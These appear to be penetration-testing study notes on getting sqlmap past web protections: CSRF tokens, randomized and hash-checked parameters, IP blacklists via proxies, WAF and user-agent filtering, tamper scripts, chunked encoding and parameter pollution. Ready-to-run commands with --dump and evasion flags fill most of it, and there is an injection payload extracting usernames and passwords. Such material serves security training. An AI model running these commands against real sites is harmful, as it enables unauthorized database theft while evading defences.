BYPASSING WEBAPP PROTECTIONS

ANTI-CSRF TOKEN BYPASS

anti-cross-site request forgery tokens in all HTTP requests is one of the first line of defense against the usage of automation tools. anti-csrf was originally introduced in the prevention of scenarios with malicious links. this security feature also inadvertently hardened the applications against the (unwanted) automation.

sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"

      
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
BURP > Proxy > Intercept > Raw > right-click > copy to file > burpRequest.txt
 * this method is used when intercepting potential parameters with Burp Suite along
   with exporting the complex HTTP request with lots of different header values Burp has captured

 * inspect the request and obtain any pertinent info
    - tokens
       - id=1&t0ken=AkU8r0F07g8TsHhG9WnkrNvOyrNJchXnWWbZlkZsZM

root@oco:~$ sqlmap -r reqCase8.txt --dump --batch --no-cast --random-agent --csrf-token="t0ken" --tamper=space2comment
 * --tamper is used when WAFs are identified during the initial scans
 * the --csrf-token is used to automatically attempt to parse the target response content and search for fresh token values so sqlmap can use them in the next request
    - the token parameter name should already be available within the provided request data
      when captured by Burp

UNIQUE VALUE BYPASS

this mechanism is similar to the anti-CSRF technique except that there is no need to parse the web page content. by simply ensuring that each request has a unique value for a predefined parameter, the web application can easily prevent CSRF attempts while at the same time averting some of the automation tools.

root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
BURP > Proxy > Intercept > Raw > right-click > copy to file > burpRequest.txt
 * this method is used when intercepting potential parameters with Burp Suite along
   with exporting the complex HTTP request with lots of different header values Burp has captured

 * inspect the request and obtain any pertinent info
    - parameters: id and uid
       - GET /case9.php?id=1&uid=1797825706 HTTP/1.1
    - based on the above request, the parameter randomization value could be one of the following
       - id or uid or both!

root@oco:~$ sqlmap -r reqCase9.txt --dump --batch --no-cast --random-agent --tamper=space2comment --randomize=id
 * if this produced no results, then use the other parameter

root@oco:~$ sqlmap -r reqCase9.txt --dump --batch --no-cast --random-agent --tamper=space2comment --randomize=uid
 * the --randomize option points to the parameter name containing a value which should be randomized before being sent

CALCULATED PARAMETER BYPASS

this is a mechanism where a web application expects a proper parameter value to be calculated based on some other parameter value(s). Most often, one parameter value has to contain the message digest (e.g. h=MD5(id)) of another one. 

sqlmap -u "http://www.example.com/?id=1&h=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib; h=hashlib.md5(id).hexdigest()" --batch -v 5 | grep URI
 * the --eval option is used to bypass this mechanism.
    - this is where a valid Python code is being evaluated just before the request is being sent to the target:

IP ADDRESS CONCEALING

this method is for when the target has a protection mechanism that blacklists any IP address that triggers a malicious event.


 * the --proxy and --proxy-list options are used to conceal the attacker's IP address
    - e.g., --proxy="socks4://177.39.187.70:33283"
    - e.g., --proxy-list="proxyList"

WAF BYPASS

sqlmap initially sends a predefined malicious looking payload using a non-existent parameter name such as ?pfov=... to test for the existence of a Web Application Firewall (WAF). to identify the actual protection mechanism, SQLMap uses a third-party library identYwaf, containing the signatures of 80 different WAF solutions.


 * the --skip-waf can be used to skip this heuristical test and to to produce less noise

USER-AGENT BLACKLISTING BYPASS

when an HTTP error code 5XX is ever encountered while running SQLMap, one of the first things to think of is the potential blacklisting of the default user-agent used by SQLMap * e.g. User-agent: sqlmap/1.4.9 (http://sqlmap.org)


 * the --random-agent can be used which changes the default user-agent with a randomly chosen value from a large pool of values used by browsers.

TAMPER SCRIPTS

the most popular mechanisms implemented by SQLMap for bypassing WAF/IPS solutions are the "tamper" scripts. these are a special kind of (Python) scripts written for modifying requests just before being sent to the target to bypass some protections.

one of the most popular tamper scripts between replaces all occurrences of greater than operator (>) with NOT BETWEEN 0 AND #, and the equals operator (=) with BETWEEN # AND #. This way, many primitive protection mechanisms (focused mostly on preventing XSS attacks) are easily bypassed, at least for SQLi purposes.

Tamper scripts can be chained, one after another, within the --tamper option (e.g. --tamper=between,randomcase), where they are run based on their predefined priority. A priority is predefined to prevent any unwanted behavior, as some scripts modify payloads by modifying their SQL syntax (e.g. ifnull2ifisnull). In contrast, some tamper scripts do not care about the inner content (e.g. appendnullbyte).

Tamper scripts can modify any part of the request, although the majority change the payload content


 * the --list-tampers will display whole list of implemented tamper scripts, along with their description

MISC BYPASSES

CHUNKED TRANSFER ENCODING

the Chunked transfer encoding, turned on, splits the POST request's body into so-called "chunks." Blacklisted SQL keywords are split between chunks in a way that the request containing them can pass unnoticed.

 
 * --chunked

HTTP PARAMETER POLLUTION (HPP)

this is where payloads are split in a similar way as in case of --chunked between different same parameter named values (e.g..id=1&id=UNION&id=SELECT&id=username,password&id=FROM&id=users...), which are concatenated by the target platform if supporting it (e.g. ASP).

PreviousPOST REQUESTSNextTAMPER SCRIPTS

Last updated